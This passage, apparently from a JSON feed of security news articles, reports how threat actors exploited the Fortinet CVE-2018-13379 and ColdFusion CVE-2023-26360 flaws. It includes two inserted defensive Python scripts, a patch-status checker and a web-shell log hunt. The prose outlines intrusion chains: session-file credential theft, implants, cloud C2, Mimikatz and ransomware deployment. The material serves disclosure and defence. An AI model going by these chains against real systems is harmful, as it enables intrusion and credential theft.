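Fortinet's statement contains two facts an operator has to combine: fixed builds exist, and a box patched after the session file was already read stays exposed until its SSL-VPN passwords are rotated. The Python below turns that into a fleet check. It is an added example written for this page, not anything Fortinet ships: the fixed builds are the ones the vendor guidance quoted later in this article names (5.4.13, 5.6.14, 6.0.11, 6.2.8); the version-string format `v6.0.9,build0335`, the inventory fields and the sample fleet are assumptions; and a branch missing from that list is reported as unlisted rather than declared safe.

```python
import re
from dataclasses import dataclass

# Minimum fixed build per affected FortiOS branch, per the vendor guidance
# quoted in this article (5.4.13, 5.6.14, 6.0.11, 6.2.8).
FIXED_MIN = {
    (5, 4): (5, 4, 13),
    (5, 6): (5, 6, 14),
    (6, 0): (6, 0, 11),
    (6, 2): (6, 2, 8),
}

# Assumption: versions arrive as "v6.0.9,build0335" (the `get system status`
# style) or as bare "6.2.8"; the build number is not needed for the decision.
_VER_RE = re.compile(r"v?(\d+)\.(\d+)\.(\d+)")


def parse_fortios_version(raw: str) -> tuple:
    """'v6.0.9,build0335' -> (6, 0, 9). Raises ValueError on unrecognised input."""
    m = _VER_RE.search(raw)
    if not m:
        raise ValueError(f"unrecognised FortiOS version: {raw!r}")
    return tuple(int(x) for x in m.groups())


@dataclass
class Appliance:
    name: str
    version: str
    creds_reset_after_patch: bool     # were SSL-VPN passwords rotated after upgrading?
    sslvpn_enabled: bool = True       # the SSL-VPN web portal is the attack surface


def assess(app: Appliance) -> str:
    """Verdicts: vulnerable | patched-creds-at-risk | patched | unlisted-branch | no-sslvpn."""
    if not app.sslvpn_enabled:
        return "no-sslvpn"            # nothing to traverse; this is what 'disable VPNs' buys
    major, minor, patch = parse_fortios_version(app.version)
    fixed = FIXED_MIN.get((major, minor))
    if fixed is None:
        return "unlisted-branch"      # not in FIXED_MIN: check the vendor advisory, do not assume safe
    if (major, minor, patch) < fixed:
        return "vulnerable"
    # Patched, but the session file may already have been read before the
    # upgrade; the credentials stay usable until they are rotated.
    return "patched" if app.creds_reset_after_patch else "patched-creds-at-risk"


def triage(fleet) -> dict:
    """Group appliance names by verdict so the fix-now buckets stand out."""
    buckets = {}
    for app in fleet:
        buckets.setdefault(assess(app), []).append(app.name)
    return buckets


# Constructed inventory, not real devices or build numbers.
SAMPLE_FLEET = [
    Appliance("fw-hq-01", "v6.0.9,build0335", creds_reset_after_patch=False),
    Appliance("fw-hq-02", "v6.0.11,build0387", creds_reset_after_patch=False),
    Appliance("fw-br-01", "v6.2.8,build1234", creds_reset_after_patch=True),
    Appliance("fw-br-02", "v5.6.14,build1727", creds_reset_after_patch=True, sslvpn_enabled=False),
    Appliance("fw-lab-01", "v6.4.2,build1723", creds_reset_after_patch=False),
]

if __name__ == "__main__":
    for verdict, names in sorted(triage(SAMPLE_FLEET).items()):
        print(f"{verdict:22s} {', '.join(names)}")
```

The `patched-creds-at-risk` bucket is the one this leak is about: a device that reports a fixed build still has every account in the dumped list until those passwords are changed.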
\n\nAlthough the bug was rectified in May 2019, the security weakness has been [repeatedly](<https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html>) [exploited](<https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html>) by [multiple](<https://thehackernews.com/2021/04/hackers-exploit-unpatched-vpns-to.html>) [adversaries](<https://thehackernews.com/2021/05/data-wiper-malware-disguised-as.html>) to deploy an array of [malicious payloads](<https://thehackernews.com/2021/05/top-11-security-flaws-russian-spy.html>) on unpatched devices, prompting Fortinet to issue a series of advisories in [August 2019](<https://www.fortinet.com/blog/psirt-blogs/fortios-ssl-vulnerability>), [July 2020](<https://www.fortinet.com/blog/psirt-blogs/atp-29-targets-ssl-vpn-flaws>), [April 2021](<https://www.fortinet.com/blog/psirt-blogs/patch-vulnerability-management>), and again in [June 2021](<https://www.fortinet.com/blog/psirt-blogs/prioritizing-patching-is-essential-for-network-integrity>), urging customers to upgrade affected appliances.\n\nCVE-2018-13379 also emerged as one of the [most exploited flaws](<https://thehackernews.com/2021/07/top-30-critical-security.html>) in 2020, according to a list compiled by intelligence agencies in Australia, the U.K., and the U.S. earlier this year.\n\nIn light of the leak, Fortinet recommends that companies immediately disable all VPNs, upgrade the devices to FortiOS 5.4.13, 5.6.14, 6.0.11, or 6.2.8 and above, and then initiate an organization-wide password reset, warning that \"you may remain vulnerable post-upgrade if your users' credentials were previously compromised.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T07:16:00", "type": "thn", "title": "Hackers Leak VPN Account Passwords From 87,000 Fortinet FortiGate Devices", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-09-09T07:33:52", "id": "THN:8483C1B45A5D7BF5D501DE72F5898935", "href": "https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-06-04T09:56:20", "description": "Microsoft on Thursday said it took steps to disable malicious activity stemming from 
abuse of OneDrive by a previously undocumented threat actor it tracks under the chemical element-themed moniker Polonium.\n\nIn addition to removing the offending accounts created by the Lebanon-based activity group, the tech giant's Threat Intelligence Center (MSTIC) said it suspended over 20 malicious OneDrive applications created by Polonium and that it notified affected organizations.\n\n\"The observed activity was coordinated with other actors affiliated with Iran's Ministry of Intelligence and Security (MOIS), based primarily on victim overlap and commonality of tools and techniques,\" MSTIC [assessed](<https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/>) with \"moderate confidence.\"\n\nThe adversarial collective is believed to have breached more than 20 organizations based in Israel and one intergovernmental organization with operations in Lebanon since February 2022.\n\nTargets of interest included entities in the manufacturing, IT, transportation, defense, government, agriculture, financial, and healthcare sectors, with one cloud service provider compromised to target a downstream aviation company and law firm in what amounts to a supply chain attack.\n\nIn a vast majority of the cases, initial access is believed to have been obtained by exploiting a path traversal flaw in Fortinet appliances ([CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>)), abusing it to drop custom PowerShell implants like CreepySnail that establish connections to a command-and-control (C2) server for follow-on actions.\n\nAttack chains mounted by the actor have involved custom tools, dubbed CreepyDrive and CreepyBox, that leverage legitimate cloud services such as OneDrive and Dropbox accounts for C2 with its victims.\n\n\"The implant provides basic functionality of allowing the threat actor to upload stolen files and 
download files to run,\" the researchers said.\n\nThis is not the first time Iranian threat actors have taken advantage of cloud services. In October 2021, Cybereason [disclosed](<https://thehackernews.com/2021/10/iranian-hackers-abuse-dropbox-in.html>) an attack campaign staged by a group called MalKamak that used Dropbox for C2 communications in an attempt to stay under the radar.\n\nAdditionally, MSTIC noted that multiple victims that were compromised by Polonium were previously targeted by another Iranian group called [MuddyWater](<https://thehackernews.com/2022/01/us-cyber-command-links-muddywater.html>) (aka Mercury), which has been characterized by the U.S. Cyber Command as a \"subordinate element\" within MOIS.\n\nThe victim overlaps lend credence to earlier reports that MuddyWater is a \"[conglomerate](<https://thehackernews.com/2022/03/iranian-hackers-targeting-turkey-and.html>)\" of multiple teams along the lines of Winnti (China) and the Lazarus Group (North Korea).\n\nTo counter such threats, customers are advised to enable multi-factor authentication as well as review and audit partner relationships to minimize any unnecessary permissions.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T09:19:00", "type": "thn", "title": "Microsoft Blocks Iran-linked Lebanese Hackers Targeting Israeli Companies", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2022-06-04T08:43:20", "id": "THN:8BA951AD00E17C72D6321234DBF80D19", "href": "https://thehackernews.com/2022/06/microsoft-blocks-iran-linked-lebanese.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T10:44:03", "description": "The U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) warned of active exploitation of a [high-severity Adobe ColdFusion vulnerability](<https://thehackernews.com/2023/03/cisa-issues-urgent-warning-adobe.html>) by unidentified threat actors to gain initial access to government servers.\n\n\"The vulnerability in ColdFusion (CVE-2023-26360) presents as an improper access control issue and exploitation of this CVE can result in arbitrary code execution,\" CISA [said](<https://www.cisa.gov/news-events/alerts/2023/12/05/cisa-releases-advisory-threat-actors-exploiting-cve-2023-26360-vulnerability-adobe-coldfusion>), adding an unnamed federal agency was targeted between June and July 2023.\n\nThe shortcoming affects ColdFusion 2018 (Update 15 and earlier versions) and ColdFusion 2021 (Update 5 and earlier versions). It was addressed in ColdFusion 2018 Update 16 and ColdFusion 2021 Update 6, both released on March 14, 2023.\n\nIt was added by CISA to the Known Exploited Vulnerabilities (KEV) catalog a day later, citing evidence of active exploitation in the wild. Adobe, in an advisory released around that time, said it's aware of the flaw being \"exploited in the wild in very limited attacks.\"\n\nThe agency noted that at least two public-facing servers were compromised using the flaw, both of which were running outdated versions of the software. 
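The intrusion pattern CISA lays out for these two servers (malware dropped with HTTP POSTs into the ColdFusion directory, then a web shell driven by a JavaScript loader) leaves a recognisable shape in the web server access log: one client POSTs under the application tree and shortly afterwards requests a resource under that tree which the server had never served before. The Python below hunts for that shape. It is an added example for this page, not CISA's or Adobe's tooling: the log lines are constructed, the watched prefix `/cfapp/` stands in for the real ColdFusion web paths, and a resource counts as new if it is first seen within the log being scanned, which in production should be a baseline of known-good URLs rather than the same file.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/IIS "combined"-style line: ip ident user [ts] "METHOD path proto" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse(line):
    """Return a dict with ip, ts (aware datetime), method, path (query stripped)
    and status, or None for lines that do not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], TS_FMT)
    e["path"] = e["path"].split("?", 1)[0]
    e["status"] = int(e["status"])
    return e


def suspicious_drops(lines, watch_prefixes, window=timedelta(minutes=30)):
    """Flag (client_ip, post_path, new_path): a POST by a client under a watched
    prefix, followed within `window` by that client's request for a *different*
    path under the prefix that had never been requested before (a freshly
    written file such as a web shell or its loader). Failed requests (4xx/5xx)
    are ignored because the resource was not actually served."""
    events = sorted((e for e in map(parse, lines) if e), key=lambda e: e["ts"])
    first_seen = {}
    for e in events:
        first_seen.setdefault(e["path"], e["ts"])

    posts = defaultdict(list)      # ip -> [(ts, path)] of POSTs under watched prefixes
    hits = []
    for e in events:
        if not any(e["path"].startswith(p) for p in watch_prefixes):
            continue
        if first_seen[e["path"]] == e["ts"] and e["status"] < 400:
            for pts, ppath in posts[e["ip"]]:
                if ppath != e["path"] and timedelta(0) <= e["ts"] - pts <= window:
                    hits.append((e["ip"], ppath, e["path"]))
                    break
        if e["method"] == "POST":
            posts[e["ip"]].append((e["ts"], e["path"]))
    return hits


# Constructed sample log (RFC 5737 documentation addresses), not from the incident.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Jun/2023:10:01:02 +0000] "GET /cfapp/index.cfm HTTP/1.1" 200 5120',
    '198.51.100.9 - - [12/Jun/2023:10:01:15 +0000] "GET /cfapp/index.cfm HTTP/1.1" 200 5120',
    '203.0.113.7 - - [12/Jun/2023:10:02:40 +0000] "POST /cfapp/upload.cfm HTTP/1.1" 200 312',
    '203.0.113.7 - - [12/Jun/2023:10:02:44 +0000] "GET /cfapp/loader.js HTTP/1.1" 200 1188',
    '203.0.113.7 - - [12/Jun/2023:10:02:58 +0000] "POST /cfapp/loader.js HTTP/1.1" 200 77',
    '198.51.100.9 - - [12/Jun/2023:10:05:00 +0000] "POST /cfapp/upload.cfm HTTP/1.1" 200 312',
    '198.51.100.9 - - [12/Jun/2023:10:05:03 +0000] "GET /cfapp/index.cfm HTTP/1.1" 200 5120',
]
WATCH_PREFIXES = ("/cfapp/",)   # assumption: replace with the real ColdFusion web paths

if __name__ == "__main__":
    for ip, post_path, new_path in suspicious_drops(SAMPLE_LOG, WATCH_PREFIXES):
        print(f"{ip} POSTed to {post_path} then fetched never-before-seen {new_path}")
```

Only the first client trips the heuristic: its POST to the upload handler is followed four seconds later by a fetch of a path nobody had requested before, while the second client's POST leads only to an already-known page. A legitimate deploy produces the same shape, so the output is a lead for a file-system check of the flagged path, not a verdict on its own.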
\n\n\"Additionally, various commands were initiated by the threat actors on the compromised web servers; the exploited vulnerability allowed the threat actors to drop malware using HTTP POST commands to the directory path associated with ColdFusion,\" CISA noted.\n\nThere is evidence to suggest that the malicious activity is a reconnaissance effort carried out to map the broader network, although no lateral movement or data exfiltration has been observed.\n\nIn one of the incidents, the adversary was observed traversing the filesystem and uploading various artifacts to the web server, including binaries that are capable of exporting web browser cookies as well as malware designed to decrypt passwords for ColdFusion data sources.\n\nA second event recorded in early June 2023 entailed the deployment of a remote access trojan that's a modified version of the [ByPassGodzilla web shell](<https://github.com/Tas9er/ByPassGodzilla>) and \"utilizes a JavaScript loader to infect the device and requires communication with the actor-controlled server to perform actions.\"\n\nThe adversary also attempted to exfiltrate the Windows Registry files and made unsuccessful attempts to download data from a command-and-control (C2) server.\n\n\"During this incident, analysis strongly suggests that the threat actors likely viewed the data contained in the ColdFusion seed.properties file via the web shell interface,\" CISA said.\n\n\"The seed.properties file contains the seed value and encryption method used to encrypt passwords. The seed values can also be used to decrypt passwords. No malicious code was found on the victim system to indicate the threat actors attempted to decode any passwords using the values found in seed.properties file.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2023-12-06T10:10:00", "type": "thn", "title": "Hackers Exploited ColdFusion Vulnerability to Breach Federal Agency Servers", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2023-12-06T10:10:51", "id": "THN:D10C2C7FC285D13E18415150A4507AB6", "href": "https://thehackernews.com/2023/12/hackers-exploited-coldfusion.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-09T12:38:01", "description": "Researchers on Tuesday disclosed a new espionage campaign that resorts to destructive data-wiping attacks targeting Israeli entities at least since December 2020 that camouflage the malicious activity as ransomware extortions.\n\nCybersecurity firm SentinelOne attributed the attacks 
to a nation-state actor affiliated with Iran it tracks under the moniker \"Agrius.\"\n\n\"An analysis of what at first sight appeared to be a ransomware attack revealed new variants of wipers that were deployed in a set of destructive attacks against Israeli targets,\" the researchers [said](<https://assets.sentinelone.com/sentinellabs/evol-agrius>). \"The operators behind the attacks intentionally masked their activity as ransomware attacks, an uncommon behavior for financially motivated groups.\"\n\nThe group's modus operandi involves deploying a custom .NET malware called Apostle that has evolved to become a fully functional ransomware, supplanting its prior wiper capabilities, while some of the attacks have been carried out using a second wiper named DEADWOOD (aka Detbosit) after a logic flaw in early versions of Apostle prevented data from being erased.\n\nIn addition, the Agrius actors drop a .NET implant called IPsec Helper that can be used to exfiltrate data or deploy additional malware. 
What's more, the threat actor's tactics have also witnessed a shift from espionage to demanding ransoms from its victims to recover access to encrypted data, only to have them actually destroyed in a wiping attack.\n\n[](<https://thehackernews.com/images/-bw6vJJdJmK8/YK5m41wm5XI/AAAAAAAACpM/hW2cbdRji0Qr191iBSXgSHzTAfh_i9ERwCLcBGAsYHQ/s0/vpn.jpg>)\n\nBesides using ProtonVPN for anonymization, the Agrius attack cycle leverages 1-day vulnerabilities in web-based applications, including [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), to gain an initial foothold and subsequently deliver ASPXSpy web shells to maintain remote access to compromised systems and run arbitrary commands.\n\nIf anything, the research adds to evidence that state-sponsored actors with ties to the Iranian government are increasingly looking at ransomware operations as a subterfuge technique to mimic other financially motivated cybercriminal ransomware groups.\n\nRecently leaked documents by Lab Dookhtegan revealed an initiative called \"[Project Signal](<https://thehackernews.com/2021/05/researchers-uncover-iranian-state.html>)\" that linked Iran's Islamic Revolutionary Guard Corps to a ransomware operation through a contracting company.\n\n\"While being disruptive and effective, ransomware activities provide deniability, allowing states to send a message without taking direct blame,\" the researchers said. \"Similar strategies have been used with devastating effect by [other nation-state sponsored actors](<https://thehackernews.com/2017/06/petya-ransomware-decryption-key.html>).\"\n",
"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-26T15:30:00", "type": "thn", "title": "Data Wiper Malware Disguised As Ransomware Targets Israeli Entities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-06-07T05:01:48", "id": "THN:EAEDDF531EB90375B350E1580DE3DD02", "href": "https://thehackernews.com/2021/05/data-wiper-malware-disguised-as.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-09T12:38:22", "description": "[](<https://thehackernews.com/images/-wqhJpW-QhTc/YG79n_lop2I/AAAAAAAACNY/ZnMOyKz8e6Adj5Hy8a5WXa_-MbqnDgRLwCLcBGAsYHQ/s0/cyberattack.jpg>)\n\nUnpatched Fortinet VPN devices are being targeted in a series of attacks against industrial enterprises in Europe to deploy a new strain of ransomware called \"Cring\" inside corporate networks.\n\nAt least one of the hacking incidents 
led to the temporary shutdown of a production site, said cybersecurity firm Kaspersky in a report published on Wednesday, without publicly naming the victim.\n\nThe attacks happened in the first quarter of 2021, between January and March.\n\n\"Various details of the attack indicate that the attackers had carefully analyzed the infrastructure of the targeted organization and prepared their own infrastructure and toolset based on the information collected at the reconnaissance stage,\" [said](<https://ics-cert.kaspersky.com/reports/2021/04/07/vulnerability-in-fortigate-vpn-servers-is-exploited-in-cring-ransomware-attacks/>) Vyacheslav Kopeytsev, a security researcher at Kaspersky ICS CERT.\n\nThe disclosure comes days after the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios>) of advanced persistent threat (APT) actors actively scanning for Fortinet SSL VPN appliances vulnerable to CVE-2018-13379, among others.\n\n\"APT actors may use these vulnerabilities or other common exploitation techniques to gain initial access to multiple government, commercial, and technology services. 
Gaining initial access pre-positions the APT actors to conduct future attacks,\" the agency said.\n\n[](<https://thehackernews.com/images/-5QwYhR-6pQ0/YG794Oq_4BI/AAAAAAAACNg/cbtbheKh0Z4gm3R1vdQ6cdPUmQT6WjUNwCLcBGAsYHQ/s0/hack.jpg>)\n\n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) concerns a path traversal vulnerability in the FortiOS SSL VPN web portal, which allows unauthenticated attackers to read arbitrary system files, including the session file, which contains usernames and passwords stored in plaintext.\n\nAlthough patches for the vulnerability were released in [May 2019](<https://www.fortiguard.com/psirt/FG-IR-18-384>), Fortinet said last November that it identified a \"[large number](<https://www.fortinet.com/blog/psirt-blogs/update-regarding-cve-2018-13379>)\" of VPN appliances that remained unpatched, while also cautioning that IP addresses of those internet-facing vulnerable devices were being sold on the dark web.\n\nIn a statement shared with The Hacker News, Fortinet said it had urged customers to upgrade their appliances \"on multiple occasions in [August 2019](<https://www.fortinet.com/blog/psirt-blogs/fortios-ssl-vulnerability>), [July 2020](<https://www.fortinet.com/blog/psirt-blogs/atp-29-targets-ssl-vpn-flaws>), and again in [April 2021](<https://www.fortinet.com/blog/psirt-blogs/patch-vulnerability-management>)\" following the May 2019 fix. 
\"If customers have not done so, we urge them to immediately implement the upgrade and mitigations,\" the company said.\n\nThe attacks aimed at European businesses were no different, according to Kaspersky's incident response, which found that the deployment of Cring ransomware involved the exploitation of CVE-2018-13379 to gain access to the target networks.\n\n\"Some time prior to the main phase of the operation, the attackers performed test connections to the VPN Gateway, apparently in order to make sure that the stolen user credentials for the VPN were still valid,\" Kaspersky researchers said.\n\nUpon gaining access, the adversaries are said to have used the Mimikatz utility to siphon account credentials of Windows users who had previously logged in to the compromised system, then utilizing them to break into the domain administrator account, move laterally across the network, and eventually deploy the Cring ransomware on each machine remotely using the Cobalt Strike framework.\n\n[Cring](<https://malpedia.caad.fkie.fraunhofer.de/details/win.cring>), a nascent strain that was first observed in January 2021 by telecom provider Swisscom, encrypts specific files on the devices using strong encryption algorithms after removing traces of all backup files and terminating Microsoft Office and Oracle Database processes. 
Following successful encryption, it drops a ransom note demanding payment of two bitcoins.\n\n[](<https://thehackernews.com/images/-zg8HygZ73Eo/YG7-LtYB1JI/AAAAAAAACNo/wj8rvRY9io4E_QWg643XIdI94kejG4D5gCLcBGAsYHQ/s0/cybersecurity.jpg>)\n\nWhat's more, the threat actor was careful to hide their activity by disguising the malicious PowerShell scripts under the name \"kaspersky\" to evade detection and ensured that the server hosting the ransomware payload only responded to requests coming in from European countries.\n\n\"An analysis of the attackers' activity demonstrates that, based on the results of the reconnaissance performed on the attacked organization's network, they chose to encrypt those servers which the attackers believed would cause the greatest damage to the enterprise's operations if lost,\" Kopeytsev [said](<https://usa.kaspersky.com/about/press-releases/2021_na-cring-ransomware-infects-industrial-targets-through-vulnerability-in-vpn-servers>).\n",
"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-08T13:12:00", "type": "thn", "title": "Hackers Exploit Unpatched VPNs to Install Ransomware on Industrial Targets", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-04-13T05:39:44", "id": "THN:FBDAEC0555EDC3089DC0966D121E0BCE", "href": "https://thehackernews.com/2021/04/hackers-exploit-unpatched-vpns-to.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-09T12:37:32", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgcW-6sY33kcH0dmBIKaK9mpaBaPRVIHpXHjT6Hgy_cMiHxlaNJfxuW1eMvQDiHyvzDLYVJGlJVA2b_pyL6m02QdpItx8VmJbN4PgH539vr05iJNN2nhAyDflMWDr-NbNmKaPQvhSn59trm4goPShyfhF5aIO8nNOTMAMBWoNZZ5zvA73ryI_wfVzbT>)\n\nA \"potentially destructive actor\" aligned with the government of Iran is actively exploiting the well-known [Log4j 
vulnerability](<https://thehackernews.com/2022/01/microsoft-warns-of-continued-attacks.html>) to infect unpatched VMware Horizon servers with ransomware.\n\nCybersecurity firm SentinelOne dubbed the group \"**TunnelVision**\" owing to their heavy reliance on tunneling tools, with overlaps in tactics observed to that of a broader group tracked under the moniker [Phosphorus](<https://thehackernews.com/2022/01/iranian-hackers-exploit-log4j.html>) as well as Charming Kitten and Nemesis Kitten.\n\n\"TunnelVision activities are characterized by wide-exploitation of 1-day vulnerabilities in target regions,\" SentinelOne researchers Amitai Ben Shushan Ehrlich and Yair Rigevsky [said](<https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/>) in a report, with the intrusions detected in the Middle East and the U.S.\n\nAlso observed alongside Log4Shell is the exploitation of Fortinet FortiOS path traversal flaw ([CVE-2018-13379](<https://thehackernews.com/2022/02/us-says-russian-hackers-stealing.html>)) and the Microsoft Exchange [ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>) vulnerability to gain initial access into the target networks for post-exploitation.\n\n\"TunnelVision attackers have been actively exploiting the vulnerability to run malicious PowerShell commands, deploy backdoors, create backdoor users, harvest credentials and perform lateral movement,\" the researchers said.\n\nThe PowerShell commands are used as a launchpad to download tools like Ngrok and run further commands by means of reverse shells that are employed to drop a PowerShell backdoor that's capable of gathering credentials and executing reconnaissance commands.\n\nSentinelOne also said it identified similarities in the mechanism used to execute the reverse web shell with another PowerShell-based implant called 
[PowerLess](<https://thehackernews.com/2022/02/iranian-hackers-using-new-powershell.html>) that was disclosed by Cybereason researchers earlier this month.\n\nAll through the activity, the threat actor is said to have utilized a GitHub repository known as \"VmWareHorizon\" under the username \"protections20\" to host the malicious payloads.\n\nThe cybersecurity company said it's associating the attacks to a separate Iranian cluster not because they are unrelated, but owing to the fact that \"there is at present insufficient data to treat them as identical to any of the aforementioned attributions.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-18T07:40:00", "type": "thn", "title": "Iranian Hackers Targeting VMware Horizon Log4j Flaws to Deploy Ransomware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", 